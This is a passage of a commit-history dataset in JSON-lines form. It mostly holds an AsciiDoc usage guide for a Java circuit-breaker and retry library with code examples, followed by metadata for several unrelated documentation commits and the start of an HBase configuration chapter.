The call to `Try.of` returns a `Failure<Throwable>` Monad so that the chained function is not invoked.\n\n[source,java]\n----\n\/\/ Given\nCircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.ofDefaults();\n\/\/ Create a custom configuration so that only 1 failure is allowed and the wait interval is 1[s]\nCircuitBreakerConfig circuitBreakerConfig = CircuitBreakerConfig.custom()\n    .maxFailures(1)\n    .waitInterval(1000)\n    .build();\nCircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker(\"uniqueName\", circuitBreakerConfig);\n\n\/\/ CircuitBreaker is initially CLOSED\nassertThat(circuitBreaker.getState()).isEqualTo(CircuitBreaker.State.CLOSED);\n\/\/ Simulate a failure attempt\ncircuitBreaker.recordFailure(new RuntimeException());\n\/\/ CircuitBreaker is still CLOSED, because 1 failure is allowed\nassertThat(circuitBreaker.getState()).isEqualTo(CircuitBreaker.State.CLOSED);\n\/\/ Simulate a failure attempt\ncircuitBreaker.recordFailure(new RuntimeException());\n\/\/ CircuitBreaker is OPEN, because the failure count exceeds maxFailures\nassertThat(circuitBreaker.getState()).isEqualTo(CircuitBreaker.State.OPEN);\n\n\/\/ When I decorate my function and invoke the decorated function\nTry<String> result = Try.of(CircuitBreaker.decorateCheckedSupplier(() -> \"Hello\", circuitBreaker))\n    .map(value -> value + \" world\");\n\n\/\/ Then the call fails, because CircuitBreaker is OPEN\nassertThat(result.isFailure()).isTrue();\n\/\/ and the exception is a CircuitBreakerOpenException\nassertThat(result.failed().get()).isInstanceOf(CircuitBreakerOpenException.class);\n----\n\n=== Recover from an exception\n\nIf you want to recover from any exception, you can chain the method `Try.recover()`. The recovery method is only invoked if `Try.of()` returns a `Failure<Throwable>` Monad.\n\n[source,java]\n----\n\/\/Given\nCircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.ofDefaults();\nCircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker(\"uniqueName\");\n\n\/\/ When I decorate my function and invoke the decorated function\nTry.CheckedSupplier<String> checkedSupplier = CircuitBreaker.decorateCheckedSupplier(() -> {\n    Thread.sleep(1000);\n    throw new RuntimeException(\"BAM!\");\n    }, circuitBreaker);\nTry<String> result = Try.of(checkedSupplier)\n    .recover((throwable) -> \"Hello Recovery\");\n\n\/\/Then the function should be a success, because the exception could be recovered\nassertThat(result.isSuccess()).isTrue();\n\/\/ and the result must match the result of the recovery function.\nassertThat(result.get()).isEqualTo(\"Hello Recovery\");\n----\n\n=== Customize exception handler\nThe default exception handler counts all types of exceptions as failures and triggers the CircuitBreaker. If you want to use a custom exception handler, you have to implement the functional interface `Predicate` which has a method `test`.
The Predicate must return true if the exception should count as a failure, otherwise it must return false.\nThe following example shows how to ignore an `IOException`, but all other exception types still count as failures.\n\n[source,java,indent=0]\n----\ninclude::..\/..\/test\/java\/io\/github\/robwin\/circuitbreaker\/CircuitBreakerTest.java[tags=shouldNotTriggerCircuitBreakerOpenException]\n----\n\n=== Customize event listener\nThe default event listener logs state transitions with INFO level.\n\n----\nINFO i.g.r.c.i.DefaultCircuitBreakerEventListener - CircuitBreaker 'testName' changes state from CLOSED to OPEN\n----\n\nIf you want to use a custom event listener, you have to implement the functional interface `CircuitBreakerEventListener` which has a method `onCircuitBreakerEvent(CircuitBreakerEvent circuitBreakerEvent)`. The only event which currently exists is `CircuitBreakerStateTransitionEvent`.\n\n[source,java]\n----\nCircuitBreakerConfig circuitBreakerConfig = CircuitBreakerConfig.custom()\n .onCircuitBreakerEvent((event) -> LOG.info(event.toString()))\n .build();\n----\n\n=== Retry a failed function\n\nYou can also retry a failed function and recover from the exception, if the maximum retry count was reached. You can create a `Retry` context using a default configuration as follows.\n\n[source,java]\n----\n\/\/ Create a Retry context with a default global configuration\n\/\/ (maxAttempts = 3, waitInterval = 500[ms], ignoredExceptions = empty)\nRetry retryContext = Retry.ofDefaults();\n----\n\nIn order to create a custom `Retry` context, you can use the Retry context builder. You can configure the maximum number of retry attempts and the wait interval [ms] between successive attempts. Furthermore, you can add exceptions to the ignore list which must not trigger a retry.\n\n[source,java]\n----\nRetry retryContext = Retry.custom()\n .maxAttempts(2)\n .waitInterval(1000)\n .onException(throwable -> Match.of(throwable)\n .whenType(WebServiceException.class).then(false)\n .otherwise(true).get())\n .build();\n----\n\nYou can decorate any `Supplier \/ Runnable \/ Function` or `CheckedSupplier \/ CheckedRunnable \/ CheckedFunction` function with `Retry.retryableCheckedSupplier()`, `Retry.retryableCheckedRunnable()` or `Retry.retryableCheckedFunction()`.\n\n[source,java]\n----\n\/\/ Given I have a HelloWorldService which throws an exception\nHelloWorldService helloWorldService = mock(HelloWorldService.class);\ngiven(helloWorldService.sayHelloWorld()).willThrow(new WebServiceException(\"BAM!\"));\n\n\/\/ Create a Retry with default configuration\n\/\/ (maxAttempts = 3, waitInterval = 500[ms], ignoredExceptions = empty)\nRetry retryContext = Retry.ofDefaults();\n\/\/ Decorate the invocation of the HelloWorldService\nTry.CheckedSupplier<String> retryableSupplier = Retry.retryableCheckedSupplier(helloWorldService::sayHelloWorld, retryContext);\n\n\/\/ When I invoke the function\nTry<String> result = Try.of(retryableSupplier).recover((throwable) -> \"Hello world from recovery function\");\n\n\/\/ Then the helloWorldService should be invoked 3 times\nBDDMockito.then(helloWorldService).should(times(3)).sayHelloWorld();\n\/\/ and the exception should be handled by the recovery function\nassertThat(result.get()).isEqualTo(\"Hello world from recovery function\");\n----\n\n=== CompletableFuture example\n\nYou can also invoke a decorated function asynchronously by using a `CompletableFuture` and chain further functions.\n\n[source,java]\n----\n\/\/ Given\nCircuitBreakerRegistry circuitBreakerRegistry 
= CircuitBreakerRegistry.ofDefaults();\nCircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker(\"testName\");\n\n\/\/ When\nSupplier<String> decoratedSupplier = CircuitBreaker\n .decorateSupplier(() -> \"This can be any method which returns: 'Hello\", circuitBreaker);\n\nCompletableFuture<String> future = CompletableFuture.supplyAsync(decoratedSupplier)\n .thenApply(value -> value + \" world'\");\n\n\/\/Then\nassertThat(future.get()).isEqualTo(\"This can be any method which returns: 'Hello world'\");\n----\n\n=== Reactive Streams example\n\nYou can also invoke a decorated function asynchronously by using a Reactive Streams implementation like https:\/\/github.com\/ReactiveX\/RxJava[RxJava] or https:\/\/github.com\/reactor\/reactor\/[Project Reactor].\n\n[source,java]\n----\n \/\/ Given\nCircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.ofDefaults();\nCircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker(\"testName\");\n\/\/ CircuitBreaker is initially CLOSED\ncircuitBreaker.recordFailure(new RuntimeException());\nassertThat(circuitBreaker.getState()).isEqualTo(CircuitBreaker.State.CLOSED);\n\/\/ CircuitBreaker is still CLOSED, because 1 failure is allowed\nassertThat(circuitBreaker.getState()).isEqualTo(CircuitBreaker.State.CLOSED);\ncircuitBreaker.recordFailure(new RuntimeException());\n\/\/ CircuitBreaker is OPEN, because maxFailures > 1\nassertThat(circuitBreaker.getState()).isEqualTo(CircuitBreaker.State.OPEN);\n\n\/\/ Decorate the supplier of the HelloWorldService with CircuitBreaker functionality\nSupplier<String> supplier = CircuitBreaker.decorateSupplier(() -> \"Hello world\", circuitBreaker);\n\n\/\/When I consume from a reactive stream it should forward the CircuitBreakerOpenException.\nStreams.generate(supplier::get)\n .map(value -> value + \" from reactive streams\")\n .consume(value -> {\n LOG.info(value);\n }, exception -> {\n LOG.info(\"Exception handled: \" + exception.toString());\n assertThat(exception).isInstanceOf(CircuitBreakerOpenException.class);\n });\n----\n\n=== Example with Dropwizard Metrics\n\nYou can use https:\/\/dropwizard.github.io\/metrics\/[Dropwizard Metrics] to get runtime metrics of your functions. The project provides several higher-order functions to decorate any `Supplier \/ Runnable \/ Function` or `CheckedSupplier \/ CheckedRunnable \/ CheckedFunction`. The decorator creates a histogram and a meter for your function. A histogram measures min, mean, max, standard deviation and quantiles like the median or 95th percentile of the execution time. 
A meter measures the rate of executions.\n\n\n[source,java]\n----\n\/\/ Given\nCircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.ofDefaults();\nCircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker(\"uniqueName\");\nMetricRegistry metricRegistry = new MetricRegistry();\nTimer timer = metricRegistry.timer(name(\"test\"));\n\n\/\/ When I create a long running supplier which takes 2 seconds\nTry.CheckedSupplier<String> supplier = () -> {\n Thread.sleep(2000);\n return \"Hello world\";\n};\n\n\/\/ and decorate the supplier with a Metrics timer\nTry.CheckedSupplier<String> timedSupplier = Metrics.timedCheckedSupplier(supplier, timer);\n\n\/\/ and decorate the supplier with a CircuitBreaker\nTry.CheckedSupplier<String> circuitBreakerAndTimedSupplier = CircuitBreaker\n .decorateCheckedSupplier(timedSupplier, circuitBreaker);\n\nString value = circuitBreakerAndTimedSupplier.get();\n\n\/\/ Then the Metrics execution counter should be 1\nassertThat(timer.getCount()).isEqualTo(1);\n\/\/ and the mean time should be greater than 2[s]\nassertThat(timer.getSnapshot().getMean()).isGreaterThan(2);\n\nassertThat(value).isEqualTo(\"Hello world\");\n----\n","old_contents":"== Usage Guide\n\n=== Configure the CircuitBreaker\n\nThis library comes with an `InMemoryCircuitBreakerRegistry` based on a `ConcurrentMap` which provides thread safety and atomicity guarantees. You must use the CircuitBreakerRegistry to manage (create and retrieve) your CircuitBreakers. You can create a `InMemoryCircuitBreakerRegistry` with a default global `CircuitBreakerConfig` for all of your CircuitBreakers as follows.\n\n[source,java]\n----\n\/\/ Create a InMemoryCircuitBreakerRegistry with a default global configuration\n\/\/ (maxFailures = 3, waitInterval = 60[s], ignoredExceptions = empty)\nCircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.ofDefaults();\n----\n\nAs an alternative you can provide your own custom global `CircuitBreakerConfig`. In order to create a custom global CircuitBreakerConfig or a CircuitBreakerConfig for a specific CircuitBreaker, you can use the CircuitBreakerConfig builder. You can configure the maximum number of allowed failures and the wait interval [ms], which specifies how long the CircuitBreaker should stay in state `OPEN`. 
Furthermore, you can add exceptions to the ignore list which must not trigger the CircuitBreaker.\n\n[source,java]\n----\n\/\/ Create a custom configuration for a CircuitBreaker\nCircuitBreakerConfig circuitBreakerConfig = CircuitBreakerConfig.custom()\n .maxFailures(1)\n .waitInterval(1000)\n .ignoredException(BusinessException.class)\n .ignoredException(AnotherBusinessException.class)\n .build();\n\n\/\/ Create a InMemoryCircuitBreakerRegistry with a custom global configuration\nCircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.of(circuitBreakerConfig);\n\n\/\/ Get a CircuitBreaker from the CircuitBreakerRegistry with the global default configuration\nCircuitBreaker circuitBreaker2 = circuitBreakerRegistry.circuitBreaker(\"otherName\");\n\n\/\/ Get a CircuitBreaker from the CircuitBreakerRegistry with a custom configuration\nCircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker(\"uniqueName\", circuitBreakerConfig);\n----\n\n=== Functional programming example\n\nYou can decorate any `Supplier \/ Runnable \/ Function` or `CheckedSupplier \/ CheckedRunnable \/ CheckedFunction` function with `CircuitBreaker.decorateCheckedSupplier()`, `CircuitBreaker.decorateCheckedRunnable()` or `CircuitBreaker.decorateCheckedFunction()`. You can invoke the returned function with `Try.of()` or `Try.run()` from https:\/\/github.com\/javaslang\/javaslang[javaslang]. This allows to chain further functions with `map`, `flatMap`, `filter`, `recover` or `andThen`. The chained functions are only invoked, if the CircuitBreaker is CLOSED or HALF_CLOSED.\nIn the following example, `Try.of()` returns a `Success<String>` Monad, if the invocation of the function is successful. If the function throws an exception, a `Failure<Throwable>` Monad is returned and `map` is not invoked.\n\n[source,java]\n----\n\/\/ Given\nCircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.ofDefaults();\nCircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker(\"uniqueName\");\n\n\/\/ When\nTry.CheckedSupplier<String> decoratedSupplier = CircuitBreaker\n .decorateCheckedSupplier(() -> \"This can be any method which returns: 'Hello\", circuitBreaker);\n\n\/\/ You can chain other functions with `map` and `flatMap`.\n\/\/ The `Try` Monad returns a `Success<String>`, if all functions run successfully.\nTry<String> result = Try.of(decoratedSupplier)\n .map(value -> value + \" world'\");\n\n\/\/ Then\nassertThat(result.isSuccess()).isTrue();\nassertThat(result.get()).isEqualTo(\"This can be any method which returns: 'Hello world'\");\n----\n\nYou could also chain up functions which are decorated by different CircuitBreakers.\n\n[source,java]\n----\n\/\/Given\nCircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.ofDefaults();\nCircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker(\"testName\");\nCircuitBreaker anotherCircuitBreaker = circuitBreakerRegistry.circuitBreaker(\"anotherTestName\");\n\n\/\/ When I create a Supplier and a Function which are decorated by different CircuitBreakers\nTry.CheckedSupplier<String> decoratedSupplier = CircuitBreaker\n .decorateCheckedSupplier(() -> \"Hello\", circuitBreaker);\n\nTry.CheckedFunction<String, String> decoratedFunction = CircuitBreaker\n .decorateCheckedFunction((input) -> input + \" world\", anotherCircuitBreaker);\n\n\/\/ and I chain a function with `map`.\nTry<String> result = Try.of(decoratedSupplier)\n .map(decoratedFunction);\n\n\/\/ Then\nassertThat(result.get()).isEqualTo(\"Hello 
world\");\n----\n\n=== OPEN CircuitBreaker example\n\nIn this test case `map` is not invoked, because the CircuitBreaker is OPEN. The call to `Try.of` returns a `Failure<Throwable>` Monad so that the chained function is not invoked.\n\n[source,java]\n----\n\/\/ Given\nCircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.ofDefaults();\n\/\/ Create a custom configration so that only 1 failure is allowed and the wait interval is 1[s]\nCircuitBreakerConfig circuitBreakerConfig = CircuitBreakerConfig.custom()\n .maxFailures(1)\n .waitInterval(1000)\n .build();\nCircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker(\"uniqueName\", circuitBreakerConfig);\n\n\/\/ CircuitBreaker is initially CLOSED\nassertThat(circuitBreaker.getState()).isEqualTo(CircuitBreaker.State.CLOSED);\n\/\/ Simulate a failure attempt\ncircuitBreaker.recordFailure(new RuntimeException());\n\/\/ CircuitBreaker is still CLOSED, because 1 failure is allowed\nassertThat(circuitBreaker.getState()).isEqualTo(CircuitBreaker.State.CLOSED);\n\/\/ Simulate a failure attempt\ncircuitBreaker.recordFailure(new RuntimeException());\n\/\/ CircuitBreaker is OPEN, because maxFailures > 1\nassertThat(circuitBreaker.getState()).isEqualTo(CircuitBreaker.State.OPEN);\n\n\/\/ When I decorate my function and invoke the decorated function\nTry<String> result = Try.of(CircuitBreaker.decorateCheckedSupplier(() -> \"Hello\", circuitBreaker))\n .map(value -> value + \" world\");\n\n\/\/ Then the call fails, because CircuitBreaker is OPEN\nassertThat(result.isFailure()).isTrue();\n\/\/ and the exception is a CircuitBreakerOpenException\nassertThat(result.failed().get()).isInstanceOf(CircuitBreakerOpenException.class);\n----\n\n=== Recover from an exception\n\nIf you want to recover from any exception, you can chain the method `Try.recover()`. The recovery method is only invoked, if `Try.of()` returns a `Failure<Throwable>` Monad.\n\n[source,java]\n----\n\/\/Given\nCircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.ofDefaults();\nCircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker(\"uniqueName\");\n\n\/\/ When I decorate my function and invoke the decorated function\nTry.CheckedSupplier<String> checkedSupplier = CircuitBreaker.decorateCheckedSupplier(() -> {\n Thread.sleep(1000);\n throw new RuntimeException(\"BAM!\");\n }, circuitBreaker);\nTry<String> result = Try.of(checkedSupplier)\n .recover((throwable) -> \"Hello Recovery\");\n\n\/\/Then the function should be a success, because the exception could be recovered\nassertThat(result.isSuccess()).isTrue();\n\/\/ and the result must match the result of the recovery function.\nassertThat(result.get()).isEqualTo(\"Hello Recovery\");\n----\n\n=== Customize exception handler\nThe default exception handler counts all type of exceptions as failures and triggers the CircuitBreaker. If you want to use a custom exception handler, you have to implement the functional interface `Predicate` which has a method `test`. 
The Predicate must return true if the exception should count as a failure, otherwise it must return false.\nThe following example shows how to ignore an `IOException`, but all other exception types still count as failures.\n\n[source,java,indent=0]\n----\ninclude::..\/..\/test\/java\/io\/github\/robwin\/circuitbreaker\/CircuitBreakerTest.java[tags=shouldNotTriggerCircuitBreakerOpenException]\n----\n\n=== Customize event listener\nThe default event listener logs state transitions with INFO level.\n\n----\nINFO i.g.r.c.i.DefaultCircuitBreakerEventListener - CircuitBreaker 'testName' changes state from CLOSED to OPEN\n----\n\nIf you want to use a custom event listener, you have to implement the functional interface `CircuitBreakerEventListener` which has a method `onCircuitBreakerEvent(CircuitBreakerEvent circuitBreakerEvent)`. The only event which currently exists is `CircuitBreakerStateTransitionEvent`.\n\n[source,java]\n----\nCircuitBreakerConfig circuitBreakerConfig = CircuitBreakerConfig.custom()\n .onCircuitBreakerEvent((event) -> LOG.info(event.toString()))\n .build();\n----\n\n=== Retry a failed function\n\nYou can also retry a failed function and recover from the exception, if the maximum retry count was reached. You can create a `Retry` context using a default configuration as follows.\n\n[source,java]\n----\n\/\/ Create a Retry context with a default global configuration\n\/\/ (maxAttempts = 3, waitInterval = 500[ms], ignoredExceptions = empty)\nRetry retryContext = Retry.ofDefaults();\n----\n\nIn order to create a custom `Retry` context, you can use the Retry context builder. You can configure the maximum number of retry attempts and the wait interval [ms] between successive attempts. Furthermore, you can add exceptions to the ignore list which must not trigger a retry.\n\n[source,java]\n----\nRetry retryContext = Retry.custom()\n .maxAttempts(2)\n .waitInterval(1000)\n .onException(throwable -> Match.of(throwable)\n .whenType(WebServiceException.class).then(false)\n .otherwise(true).get())\n .build();\n----\n\nYou can decorate any `Supplier \/ Runnable \/ Function` or `CheckedSupplier \/ CheckedRunnable \/ CheckedFunction` function with `Retry.retryableCheckedSupplier()`, `Retry.retryableCheckedRunnable()` or `Retry.retryableCheckedFunction()`.\n\n[source,java]\n----\n\/\/ Given I have a HelloWorldService which throws an exception\nHelloWorldService helloWorldService = mock(HelloWorldService.class);\ngiven(helloWorldService.sayHelloWorld()).willThrow(new WebServiceException(\"BAM!\"));\n\n\/\/ Create a Retry with default configuration\n\/\/ (maxAttempts = 3, waitInterval = 500[ms], ignoredExceptions = empty)\nRetry retryContext = Retry.ofDefaults();\n\/\/ Decorate the invocation of the HelloWorldService\nTry.CheckedSupplier<String> retryableSupplier = Retry.retryableCheckedSupplier(helloWorldService::sayHelloWorld, retryContext);\n\n\/\/ When I invoke the function\nTry<String> result = Try.of(retryableSupplier).recover((throwable) -> \"Hello world from recovery function\");\n\n\/\/ Then the helloWorldService should be invoked 3 times\nBDDMockito.then(helloWorldService).should(times(3)).sayHelloWorld();\n\/\/ and the exception should be handled by the recovery function\nassertThat(result.get()).isEqualTo(\"Hello world from recovery function\");\n----\n\n=== CompletableFuture example\n\nYou can also invoke a decorated function asynchronously by using a `CompletableFuture` and chain further functions.\n\n[source,java]\n----\n\/\/ Given\nCircuitBreakerRegistry circuitBreakerRegistry 
= CircuitBreakerRegistry.ofDefaults();\nCircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker(\"testName\");\n\n\/\/ When\nSupplier<String> decoratedSupplier = CircuitBreaker\n .decorateSupplier(() -> \"This can be any method which returns: 'Hello\", circuitBreaker);\n\nCompletableFuture<String> future = CompletableFuture.supplyAsync(decoratedSupplier)\n .thenApply(value -> value + \" world'\");\n\n\/\/Then\nassertThat(future.get()).isEqualTo(\"This can be any method which returns: 'Hello world'\");\n----\n\n=== Reactive Streams example\n\nYou can also invoke a decorated function asynchronously by using a Reactive Streams implementation like https:\/\/github.com\/ReactiveX\/RxJava[RxJava] or https:\/\/github.com\/reactor\/reactor\/[Project Reactor].\n\n[source,java]\n----\n \/\/ Given\nCircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.ofDefaults();\nCircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker(\"testName\");\n\/\/ CircuitBreaker is initially CLOSED\ncircuitBreaker.recordFailure(new RuntimeException());\nassertThat(circuitBreaker.getState()).isEqualTo(CircuitBreaker.State.CLOSED);\n\/\/ CircuitBreaker is still CLOSED, because 1 failure is allowed\nassertThat(circuitBreaker.getState()).isEqualTo(CircuitBreaker.State.CLOSED);\ncircuitBreaker.recordFailure(new RuntimeException());\n\/\/ CircuitBreaker is OPEN, because maxFailures > 1\nassertThat(circuitBreaker.getState()).isEqualTo(CircuitBreaker.State.OPEN);\n\n\/\/ Decorate the supplier of the HelloWorldService with CircuitBreaker functionality\nSupplier<String> supplier = CircuitBreaker.decorateSupplier(() -> \"Hello world\", circuitBreaker);\n\n\/\/When I consume from a reactive stream it should forward the CircuitBreakerOpenException.\nStreams.generate(supplier::get)\n .map(value -> value + \" from reactive streams\")\n .consume(value -> {\n LOG.info(value);\n }, exception -> {\n LOG.info(\"Exception handled: \" + exception.toString());\n assertThat(exception).isInstanceOf(CircuitBreakerOpenException.class);\n });\n----\n\n=== Example with Dropwizard Metrics\n\nYou can use https:\/\/dropwizard.github.io\/metrics\/[Dropwizard Metrics] to get runtime metrics of your functions. The project provides several higher-order functions to decorate any `Supplier \/ Runnable \/ Function` or `CheckedSupplier \/ CheckedRunnable \/ CheckedFunction`. The decorator creates a histogram and a meter for your function. A histogram measures min, mean, max, standard deviation and quantiles like the median or 95th percentile of the execution time. 
A meter measures the rate of executions.\n\n\n[source,java]\n----\n\/\/ Given\nCircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.ofDefaults();\nCircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker(\"uniqueName\");\nMetricRegistry metricRegistry = new MetricRegistry();\nTimer timer = metricRegistry.timer(name(\"test\"));\n\n\/\/ When I create a long running supplier which takes 2 seconds\nTry.CheckedSupplier<String> supplier = () -> {\n Thread.sleep(2000);\n return \"Hello world\";\n};\n\n\/\/ and decorate the supplier with a Metrics timer\nTry.CheckedSupplier<String> timedSupplier = Metrics.timedCheckedSupplier(supplier, timer);\n\n\/\/ and decorate the supplier with a CircuitBreaker\nTry.CheckedSupplier<String> circuitBreakerAndTimedSupplier = CircuitBreaker\n .decorateCheckedSupplier(timedSupplier, circuitBreaker);\n\nString value = circuitBreakerAndTimedSupplier.get();\n\n\/\/ Then the Metrics execution counter should be 1\nassertThat(timer.getCount()).isEqualTo(1);\n\/\/ and the mean time should be greater than 2[s]\nassertThat(timer.getSnapshot().getMean()).isGreaterThan(2);\n\nassertThat(value).isEqualTo(\"Hello world\");\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"709b4a82d73d4930c2af6f88293698aaf71c42d6","subject":"Upgrade source cluster to lastest z-stream release","message":"Upgrade source cluster to lastest z-stream release\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/migration-prerequisites.adoc","new_file":"modules\/migration-prerequisites.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"51a4831fcd405ae98ff0061852118896496e87d6","subject":"Update 2016-02-06-.adoc","message":"Update 2016-02-06-.adoc","repos":"Oziabr\/Oziabr.github.io,Oziabr\/Oziabr.github.io","old_file":"_posts\/2016-02-06-.adoc","new_file":"_posts\/2016-02-06-.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"mit","lang":"AsciiDoc"} {"commit":"688ba19e70596917773cf3664d1a0b3fcd107cb5","subject":"fix smart quotes","message":"fix smart quotes\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"docs\/modules\/contributions\/pages\/tools\/navigation.adoc","new_file":"docs\/modules\/contributions\/pages\/tools\/navigation.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"9ea1a7d422080fab2e7621ad5629322dc01de1f7","subject":"HBASE-20264 add Javas 9 and 10 to the prerequisites table and add a note about using LTS releases.","message":"HBASE-20264 add Javas 9 and 10 to the prerequisites table and add a note about using LTS releases.\n\n* Make the #java anchor point at a section instead of directly at a table\n* Add a note to the intro of that section about LTS JDKs\n* Add columns for JDK9 and JDK10 that say unsupported and point to HBASE-20264\n\nSigned-off-by: Zach York 
<21e0ab0297705b6f8993d0122af3564835bb8db2@amazon.com>\n","repos":"Apache9\/hbase,francisliu\/hbase,apurtell\/hbase,mahak\/hbase,ChinmaySKulkarni\/hbase,apurtell\/hbase,ultratendency\/hbase,ultratendency\/hbase,ndimiduk\/hbase,ChinmaySKulkarni\/hbase,apurtell\/hbase,francisliu\/hbase,Apache9\/hbase,apurtell\/hbase,mahak\/hbase,Apache9\/hbase,bijugs\/hbase,ndimiduk\/hbase,ChinmaySKulkarni\/hbase,francisliu\/hbase,Apache9\/hbase,ndimiduk\/hbase,francisliu\/hbase,mahak\/hbase,ndimiduk\/hbase,bijugs\/hbase,ChinmaySKulkarni\/hbase,apurtell\/hbase,mahak\/hbase,mahak\/hbase,Eshcar\/hbase,bijugs\/hbase,ChinmaySKulkarni\/hbase,ultratendency\/hbase,Eshcar\/hbase,ndimiduk\/hbase,apurtell\/hbase,Eshcar\/hbase,mahak\/hbase,ChinmaySKulkarni\/hbase,Apache9\/hbase,francisliu\/hbase,ultratendency\/hbase,francisliu\/hbase,mahak\/hbase,ndimiduk\/hbase,francisliu\/hbase,bijugs\/hbase,apurtell\/hbase,mahak\/hbase,bijugs\/hbase,ultratendency\/hbase,ultratendency\/hbase,francisliu\/hbase,ChinmaySKulkarni\/hbase,ndimiduk\/hbase,mahak\/hbase,Eshcar\/hbase,apurtell\/hbase,mahak\/hbase,ndimiduk\/hbase,Eshcar\/hbase,Eshcar\/hbase,ultratendency\/hbase,ChinmaySKulkarni\/hbase,Eshcar\/hbase,ndimiduk\/hbase,Eshcar\/hbase,Apache9\/hbase,ndimiduk\/hbase,ChinmaySKulkarni\/hbase,bijugs\/hbase,ultratendency\/hbase,Apache9\/hbase,ultratendency\/hbase,apurtell\/hbase,francisliu\/hbase,Eshcar\/hbase,bijugs\/hbase,Apache9\/hbase,bijugs\/hbase,bijugs\/hbase,Eshcar\/hbase,Apache9\/hbase,Apache9\/hbase,francisliu\/hbase,apurtell\/hbase,bijugs\/hbase,ChinmaySKulkarni\/hbase,ultratendency\/hbase","old_file":"src\/main\/asciidoc\/_chapters\/configuration.adoc","new_file":"src\/main\/asciidoc\/_chapters\/configuration.adoc","new_contents":"\/\/\/\/\n\/**\n *\n * Licensed to the Apache Software Foundation (ASF) under one\n * or more contributor license agreements. See the NOTICE file\n * distributed with this work for additional information\n * regarding copyright ownership. The ASF licenses this file\n * to you under the Apache License, Version 2.0 (the\n * \"License\"); you may not use this file except in compliance\n * with the License. 
You may obtain a copy of the License at\n *\n * http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n *\/\n\/\/\/\/\n\n[[configuration]]\n= Apache HBase Configuration\n:doctype: book\n:numbered:\n:toc: left\n:icons: font\n:experimental:\n\nThis chapter expands upon the <<getting_started>> chapter to further explain configuration of Apache HBase.\nPlease read this chapter carefully, especially the <<basic.prerequisites,Basic Prerequisites>>\nto ensure that your HBase testing and deployment goes smoothly, and prevent data loss.\nFamiliarize yourself with <<hbase_supported_tested_definitions>> as well.\n\n== Configuration Files\nApache HBase uses the same configuration system as Apache Hadoop.\nAll configuration files are located in the _conf\/_ directory, which needs to be kept in sync for each node on your cluster.\n\n.HBase Configuration File Descriptions\n_backup-masters_::\n Not present by default.\n A plain-text file which lists hosts on which the Master should start a backup Master process, one host per line.\n\n_hadoop-metrics2-hbase.properties_::\n Used to connect HBase to Hadoop's Metrics2 framework.\n See the link:https:\/\/wiki.apache.org\/hadoop\/HADOOP-6728-MetricsV2[Hadoop Wiki entry] for more information on Metrics2.\n Contains only commented-out examples by default.\n\n_hbase-env.cmd_ and _hbase-env.sh_::\n Script for Windows and Linux \/ Unix environments to set up the working environment for HBase, including the location of Java, Java options, and other environment variables.\n The file contains many commented-out examples to provide guidance.\n\n_hbase-policy.xml_::\n The default policy configuration file used by RPC servers to make authorization decisions on client requests.\n Only used if HBase <<security,security>> is enabled.\n\n_hbase-site.xml_::\n The main HBase configuration file.\n This file specifies configuration options which override HBase's default configuration.\n You can view (but do not edit) the default configuration file at _docs\/hbase-default.xml_.\n You can also view the entire effective configuration for your cluster (defaults and overrides) in the [label]#HBase Configuration# tab of the HBase Web UI.\n\n_log4j.properties_::\n Configuration file for HBase logging via `log4j`.\n\n_regionservers_::\n A plain-text file containing a list of hosts which should run a RegionServer in your HBase cluster.\n By default this file contains the single entry `localhost`.\n It should contain a list of hostnames or IP addresses, one per line, and should only contain `localhost` if each node in your cluster will run a RegionServer on its `localhost` interface.\n\n.Checking XML Validity\n[TIP]\n====\nWhen you edit XML, it is a good idea to use an XML-aware editor to be sure that your syntax is correct and your XML is well-formed.\nYou can also use the `xmllint` utility to check that your XML is well-formed.\nBy default, `xmllint` re-flows and prints the XML to standard output.\nTo check for well-formedness and only print output if errors exist, use the command `xmllint -noout filename.xml`.\n====\n\n.Keep Configuration In Sync Across the Cluster\n[WARNING]\n====\nWhen running in distributed mode, after you make an edit to an HBase configuration, make 
